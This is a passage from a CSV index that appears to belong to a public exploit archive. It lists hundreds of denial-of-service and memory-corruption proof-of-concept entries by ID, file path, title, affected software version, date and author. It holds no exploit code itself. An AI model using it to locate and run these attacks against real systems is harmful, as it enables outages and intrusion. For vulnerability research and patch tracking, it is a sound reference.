Service",2008-08-08,Antunes,multiple,dos, -32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos, -32222,exploits/multiple/dos/32222.rb,"Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",multiple,dos, -32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,windows,dos, -32248,exploits/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos, -32256,exploits/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos, -32332,exploits/windows/dos/32332.txt,"Free Download Manager - Stack Based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80 -32292,exploits/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial of Service",2008-08-23,"Luka Treiber",linux,dos, -32294,exploits/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",windows,dos, -32304,exploits/linux/dos/32304.txt,"RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",linux,dos, -32305,exploits/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",hardware,dos, -32310,exploits/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 - 'APPEND' Remote Denial of Service",2008-09-02,Antunes,multiple,dos, -32311,exploits/multiple/dos/32311.html,"Google Chrome 0.2.149 - Malformed 'title' Tag Remote Denial of Service",2008-09-02,Exodus,multiple,dos, -32329,exploits/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal (SEH) (Metasploit)",2014-03-17,"Revin Hadi Saputra",windows,dos, -32333,exploits/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos, -32335,exploits/multiple/dos/32335.js,"Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos, -32341,exploits/hardware/dos/32341.html,"Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Remote Denial of Service",2008-09-12,"Nicolas Economou",hardware,dos, -32348,exploits/linux/dos/32348.txt,"MySQL 6.0.4 - Empty Binary String Literal Remote Denial of Service",2008-03-28,"Kay Roepke",linux,dos, -32350,exploits/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder Null Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos, -32356,exploits/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 - AntiVirus Directory Path Buffer Overflow",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos, -32362,exploits/multiple/dos/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service",2008-09-12,"Luigi Auriemma",multiple,dos, -32381,exploits/multiple/dos/32381.js,"Avant Browser 11.7 Build 9 - JavaScript Engine Integer Overflow",2008-09-12,0x90,multiple,dos, -32384,exploits/linux/dos/32384.txt,"Linux Kernel 2.6.x - 'add_to_page_cache_lru()' Local Denial of Service",2007-07-20,"Jens Axboe",linux,dos, -32386,exploits/multiple/dos/32386.txt,"Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service",2008-09-16,"Luigi Auriemma",multiple,dos, -32420,exploits/windows/dos/32420.c,"Mass Downloader - Malformed Executable Denial of Service",2008-09-25,Ciph3r,windows,dos, -32428,exploits/windows/dos/32428.txt,"ZoneAlarm 8.0.20 - HTTP Proxy Remote Denial of Service",2008-09-26,quakerdoomer,windows,dos, -32435,exploits/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow (PoC)",2014-03-22,"Veysel HATAS",windows,dos, -32451,exploits/linux/dos/32451.txt,"Linux Kernel (Fedora 8/9) - 'utrace_control' Null Pointer Dereference Denial of Service",2008-10-02,"Michael Simms",linux,dos, -32452,exploits/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service",2008-10-02,"Matthew Dempsky",linux,dos, -32454,exploits/unix/dos/32454.xml,"libxml2 - Denial of Service",2008-10-02,"Christian Weiske",unix,dos, -32471,exploits/linux/dos/32471.txt,"KDE Konqueror 3.5.9 - JavaScript 'load' Denial of Service",2008-10-10,"Jeremy Brown",linux,dos, -32472,exploits/hardware/dos/32472.txt,"Nokia Web Browser for S60 - Infinite Array Sort Denial of Service",2008-10-10,"Luca Carettoni",hardware,dos, -32477,exploits/windows/dos/32477.py,"Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos, -32478,exploits/windows/dos/32478.py,"jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos, -32481,exploits/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos, -32482,exploits/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos, -32483,exploits/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos, -32519,exploits/multiple/dos/32519.txt,"Couchdb 1.5.0 - 'uuids' Denial of Service",2014-03-26,"Krusty Hack",multiple,dos, -32513,exploits/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos, -32514,exploits/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos, -32522,exploits/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos, -32534,exploits/unix/dos/32534.py,"Python 2.5.2 - 'Imageop' Module Argument Validation Buffer Overflow",2008-10-27,"Chris Evans",unix,dos, -32550,exploits/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos, -32551,exploits/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos, -32573,exploits/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,windows,dos, -32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos, -32583,exploits/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos, -32587,exploits/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos, -32596,exploits/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",multiple,dos, -32657,exploits/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,windows,dos, -32763,exploits/windows/dos/32763.html,"Microsoft Internet Explorer 7 - HTML Form Value Denial of Service",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos, -40993,exploits/android/dos/40993.txt,"Google Android max86902 Driver - 'sysfs' Interfaces Race Condition",2017-01-06,"Google Security Research",android,dos, -32675,exploits/linux/dos/32675.py,"QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service",2008-12-22,"Alfredo Ortega",linux,dos, -32682,exploits/linux/dos/32682.c,"Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service",2008-12-23,"Herbert Xu",linux,dos, -32688,exploits/windows/dos/32688.py,"Winace 2.2 - Malformed Filename Remote Denial of Service",2008-12-29,cN4phux,windows,dos, -32692,exploits/hardware/dos/32692.txt,"Symbian S60 - Malformed SMS/MMS Remote Denial of Service",2008-12-30,"Tobias Engel",hardware,dos, -32694,exploits/osx/dos/32694.pl,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)",2009-01-01,"Jeremy Brown",osx,dos, -32695,exploits/osx/dos/32695.php,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)",2009-01-01,Pr0T3cT10n,osx,dos, -32696,exploits/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos, -32697,exploits/linux/dos/32697.pl,"aMSN - '.ctt' Remote Denial of Service",2009-01-03,Hakxer,linux,dos, -32702,exploits/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 -32704,exploits/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service",2014-04-05,LiquidWorm,windows,dos, -32706,exploits/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos, -32707,exploits/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption (Denial of Service)",2014-04-06,sajith,windows,dos, -32712,exploits/multiple/dos/32712.txt,"IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service",2009-01-08,Erik,multiple,dos, -32715,exploits/php/dos/32715.php,"PHP 5.2.8 - 'popen()' Function Buffer Overflow",2009-01-12,e.wiZz!,php,dos, -32726,exploits/linux/dos/32726.txt,"Ganglia gmetad 3.0.6 - 'process_path()' Remote Stack Buffer Overflow",2009-01-15,"Spike Spiegel",linux,dos, -32740,exploits/linux/dos/32740.txt,"QNX RTOS 6.4 - '.ELF' Binary File Local Denial of Service",2009-01-19,kokanin,linux,dos, -32749,exploits/linux/dos/32749.txt,"Pidgin 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos, -32754,exploits/osx/dos/32754.c,"Apple Mac OSX 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos, -32755,exploits/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos, -32761,exploits/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - URI Remote Denial of Service",2009-01-27,Lostmon,windows,dos, -32769,exploits/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service",2009-01-30,strategma,php,dos, -32772,exploits/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos, -32774,exploits/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos, -32775,exploits/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos, -32800,exploits/linux/dos/32800.txt,"Poppler 0.10.3 - Denial of Service",2009-02-12,Romario,linux,dos, -32815,exploits/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation",2009-02-25,"Chris Evans",linux,dos, -32817,exploits/osx/dos/32817.txt,"Apple Safari 4 - 'feeds:' URI Null Pointer Dereference Remote Denial of Service",2009-02-25,Trancer,osx,dos, -32824,exploits/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos, -32836,exploits/multiple/dos/32836.html,"Mozilla Firefox 2.0.x - Nested 'window.print()' Denial of Service",2009-03-03,b3hz4d,multiple,dos, -32838,exploits/linux/dos/32838.txt,"MySQL 6.0.9 - XPath Expression Remote Denial of Service",2009-02-14,"Shane Bester",linux,dos, -32849,exploits/linux/dos/32849.txt,"PostgreSQL 8.3.6 - Conversion Encoding Remote Denial of Service",2009-03-11,"Afonin Denis",linux,dos, -32856,exploits/linux/dos/32856.txt,"MPlayer - '.AAC' File Handling Denial of Service",2008-10-07,"Hanno Bock",linux,dos, -32857,exploits/linux/dos/32857.txt,"MPlayer - '.OGM' File Handling Denial of Service",2008-10-07,"Hanno Bock",linux,dos, -32860,exploits/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos, -32865,exploits/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos, -32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos, -32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (SEH Unicode) (Denial of Service)",2014-04-16,"motaz reda",windows,dos, -32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",windows,dos, -32926,exploits/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos, -32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",windows,dos, -32949,exploits/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial of Service",2009-04-22,M4rt1n,multiple,dos, -32951,exploits/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",novell,dos, -32956,exploits/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 - File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",windows,dos, -33337,exploits/osx/dos/33337.c,"Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos, -32961,exploits/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",linux,dos, -32964,exploits/linux/dos/32964.c,"GnuTLS 2.6.x - libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote Denial of Service",2009-04-30,"Miroslav Kratochvil",linux,dos, -33077,exploits/linux/dos/33077.c,"MySQL 5.0.75 - 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos, -32995,exploits/linux/dos/32995.txt,"Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow",2009-05-27,"Simple Nomad",linux,dos, -33015,exploits/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service",2009-05-29,"Miklos Szeredi",linux,dos, -33017,exploits/linux/dos/33017.txt,"Adobe Acrobat 9.1.3 - Stack Exhaustion Denial of Service",2009-05-29,"Saint Patrick",linux,dos, -33018,exploits/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial of Service)",2014-04-25,LiquidWorm,windows,dos, -33020,exploits/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial of Service",2009-06-02,"Anibal Sacco",linux,dos, -33031,exploits/linux/dos/33031.html,"Mozilla Firefox 3.0.x - Large '.GIF' File Background Denial of Service",2009-05-10,"Ahmad Muammar",linux,dos, -33036,exploits/linux/dos/33036.txt,"Git 1.6.3 - Parameter Processing Remote Denial of Service",2009-05-05,"Shawn O. Pearce",linux,dos, -33037,exploits/multiple/dos/33037.html,"Apple QuickTime 7.4.1 - Null Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos, -33040,exploits/linux/dos/33040.txt,"GUPnP 0.12.7 - Message Handling Denial of Service",2009-05-03,"Zeeshan Ali",linux,dos, -33041,exploits/linux/dos/33041.txt,"Irssi 0.8.13 - 'WALLOPS' Message Off-by-One Heap Memory Corruption",2009-05-15,nemo,linux,dos, -33042,exploits/linux/dos/33042.txt,"Mozilla Firefox 3.0.10 - 'nsViewManager.cpp' Denial of Service",2009-05-11,"Bret McMillan",linux,dos, -33043,exploits/linux/dos/33043.txt,"Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos, -33049,exploits/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos, -33056,exploits/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)",2014-04-27,st3n,windows,dos, -33058,exploits/multiple/dos/33058.txt,"BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos, -33059,exploits/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,windows,dos, -33062,exploits/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos, -33073,exploits/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123 -33080,exploits/multiple/dos/33080.txt,"Oracle 11.1 - Database Network Foundation Heap Memory Corruption",2009-06-14,"Dennis Yurichev",multiple,dos, -33083,exploits/multiple/dos/33083.txt,"Oracle 9i/10g Database - TNS Command Remote Denial of Service",2009-06-14,"Dennis Yurichev",multiple,dos, -33086,exploits/multiple/dos/33086.txt,"America's Army 3.0.4 - Invalid Query Remote Denial of Service",2009-06-06,"Luigi Auriemma",multiple,dos, -33088,exploits/linux/dos/33088.txt,"Linux Kernel 2.6.30 - 'tun_chr_pool()' Null Pointer Dereference",2009-06-17,"Christian Borntraeger",linux,dos, -33350,exploits/windows/dos/33350.xml,"Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos, -33348,exploits/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - Denial of Service (PoC)",2014-05-14,"Martinez FrostCard",windows,dos, -33579,exploits/multiple/dos/33579.txt,"Ingres Database 9.3 - Heap Buffer Overflow",2010-01-29,"Evgeny Legerov",multiple,dos, -33096,exploits/multiple/dos/33096.txt,"Crysis 1.21/1.5 - HTTP/XML-RPC Service Access Violation Remote Denial of Service",2009-06-20,"Luigi Auriemma",multiple,dos, -33099,exploits/multiple/dos/33099.txt,"World in Conflict 1.0.1 - Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",multiple,dos, -33100,exploits/multiple/dos/33100.txt,"S.T.A.L.K.E.R. Clear Sky 1.0010 - Remote Denial of Service",2009-06-22,"Luigi Auriemma",multiple,dos, -33101,exploits/linux/dos/33101.txt,"Mozilla Firefox 3.0.11 and Thunderbird 2.0.9 - RDF File Handling Remote Memory Corruption",2009-06-21,"Christophe Charron",linux,dos, -33104,exploits/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service",2009-06-24,"Luigi Auriemma",multiple,dos, -33105,exploits/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",multiple,dos, -33133,exploits/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 and AIR - URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,multiple,dos, -33134,exploits/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos, -33584,exploits/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",multiple,dos, -33148,exploits/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' Null Pointer Dereference Denial of Service",2009-08-06,"Hiroshi Shimamoto",linux,dos, -33173,exploits/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (1)",2007-02-07,trevordixon,windows,dos, -33174,exploits/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (2)",2007-02-07,trevordixon,windows,dos, -33175,exploits/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (3)",2007-02-07,trevordixon,windows,dos, -33176,exploits/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial of Service",2009-08-18,"Brad Antoniewicz",linux,dos, -33182,exploits/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service",2009-08-23,"Luigi Auriemma",multiple,dos, -33183,exploits/novell/dos/33183.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (1)",2009-08-25,"Francis Provencher",novell,dos, -33184,exploits/novell/dos/33184.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (2)",2009-08-25,"Francis Provencher",novell,dos, -33185,exploits/windows/dos/33185.html,"Nokia Lotus Notes Connector - 'lnresobject.dll' Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos, -33193,exploits/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos, -33205,exploits/windows/dos/33205.pl,"Nokia MultiMedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos, -33216,exploits/hardware/dos/33216.txt,"Check Point Endpoint Security - Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos, -33220,exploits/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Denial of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos, -33221,exploits/windows/dos/33221.html,"Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",windows,dos, -33222,exploits/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Resource Exhaustion (Denial of Service)",2009-09-15,"Buildbot Builder",linux,dos, -33223,exploits/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos, -33224,exploits/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos, -33225,exploits/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 - 'emimap4.dll' ActiveX Control Remote Code Execution",2009-09-15,"Francis Provencher",windows,dos, -33228,exploits/linux/dos/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow",2009-09-16,"Xiao Guangrong",linux,dos, -33230,exploits/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Integer Overflow",2009-09-17,"Maksymilian Arciemowicz",linux,dos, -33233,exploits/linux/dos/33233.txt,"FFmpeg 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos, -33235,exploits/osx/dos/33235.rb,"Apple iTunes 9.0 - '.pls' Buffer Overflow",2009-09-22,"Roger Hart",osx,dos, -33710,exploits/windows/dos/33710.txt,"J. River Media Jukebox 12 - '.mp3' Remote Heap Buffer Overflow",2010-03-04,"Gjoko Krstic",windows,dos, -33251,exploits/multiple/dos/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,dos, -33269,exploits/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",linux,dos, -33271,exploits/windows/dos/33271.py,"VMware Player / VMware Workstation 6.5.3 - 'VMware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos, -33280,exploits/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",hardware,dos, -33283,exploits/linux/dos/33283.txt,"Adobe Reader 9.1.3 / Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos, -33289,exploits/linux/dos/33289.txt,"Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service",2009-08-28,"Alistair Strachan",linux,dos, -33306,exploits/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos, -33312,exploits/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos, -33314,exploits/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos, -33318,exploits/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos, -33319,exploits/bsd/dos/33319.txt,"BSD (Multiple Distributions) - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos, -33591,exploits/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",linux,dos, -33592,exploits/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos, -33328,exploits/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",hardware,dos, -33332,exploits/windows/dos/33332.py,"JetAudio 8.1.1 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos, -33335,exploits/windows/dos/33335.py,"GOM Player 2.2.57.5189 - '.ogg' Crash (PoC)",2014-05-12,"Aryan Bayaninejad",windows,dos, -33384,exploits/windows/dos/33384.py,"Wireshark 1.10.7 - Denial of Service (PoC)",2014-05-16,"Osanda Malith",windows,dos, -33386,exploits/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference",2014-05-16,Mr.XHat,multiple,dos, -33397,exploits/linux/dos/33397.txt,"MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service",2009-11-23,"Shane Bester",linux,dos, -33398,exploits/linux/dos/33398.txt,"MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service",2009-11-23,"Shane Bester",linux,dos, -33472,exploits/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow",2010-01-06,"Evgeny Legerov",multiple,dos, -33479,exploits/osx/dos/33479.c,"Apple Mac OSX 10.x - 'libc/strtod(3)' Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",osx,dos, -33480,exploits/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos, -33483,exploits/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos, -33495,exploits/windows/dos/33495.py,"Core FTP Server 1.2 build 535 (32-bi)t - Crash (PoC)",2014-05-24,"Kaczinski Ramirez",windows,dos, -33581,exploits/linux/dos/33581.txt,"Hybserv2 - ':help' Denial of Service",2010-01-29,"Julien Cristau",linux,dos, -33583,exploits/hardware/dos/33583.pl,"Xerox WorkCentre - PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",hardware,dos, -33506,exploits/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption",2010-01-12,"Dennis Yurichev",multiple,dos, -33635,exploits/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos, -33524,exploits/linux/dos/33524.txt,"OpenOffice 3.1 - '.csv' Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos, -33527,exploits/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 - 'ibmdiradm' Null Pointer Dereference Denial of Service",2006-04-01,Intevydis,unix,dos, -33531,exploits/multiple/dos/33531.py,"Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow",2010-01-15,Intevydis,multiple,dos, -33532,exploits/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption",2006-11-10,Intevydis,multiple,dos, -33533,exploits/windows/dos/33533.html,"Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,windows,dos, -33640,exploits/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,windows,dos, -40913,exploits/android/dos/40913.java,"Samsung Devices KNOX Extensions - OTP Service Heap Overflow",2016-12-13,"Google Security Research",android,dos, -33549,exploits/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' Null Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos, -33556,exploits/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service 